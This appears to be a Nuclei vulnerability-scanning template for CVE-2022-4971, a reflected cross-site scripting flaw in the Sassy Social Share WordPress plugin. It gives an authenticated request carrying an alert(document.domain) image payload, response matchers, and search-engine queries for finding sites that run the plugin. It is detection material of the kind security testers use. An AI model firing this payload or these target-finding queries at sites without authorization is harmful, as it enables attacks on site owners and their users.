id: CVE-2022-4971

info:
  name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
  author: popcorn94
  severity: medium
  description: |
    The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the urls parameter in the sharing count AJAX action, potentially stealing WordPress user sessions and performing actions on behalf of authenticated users.
  remediation: |
    Update Sassy Social Share plugin to a version newer than 3.3.3 that properly sanitizes the urls parameter and encodes output in the AJAX action.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve
    - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4971
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-4971
    cwe-id: CWE-79
    epss-score: 0.10126
    epss-percentile: 0.93289
    cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: heateor
    product: sassy_social_share
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/sassy-social-share"
    fofa-query: body=/wp-content/plugins/sassy-social-share/
    publicwww-query: /wp-content/plugins/sassy-social-share/
    google-query: inurl:"/wp-content/plugins/sassy-social-share"
  tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,sassy-social-share,xss,authenticated,vkev,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_2, "facebook_urls\":", "<img src=x onerror=alert(document.domain)>")'
          - 'contains(content_type_2, "text/html")'
          - 'status_code_2 == 200'
        condition: and
# digest: 490a00463044022054c549e1431dd6462233d47dff6d3f1605abd49bb6e9b50eb32560744d6ef7e5022057f5e8be8d4bc450490141b80047e906884613eb1e2bb46989125ed793c5a1ba:922c64590222798bb761d5b6d8e72950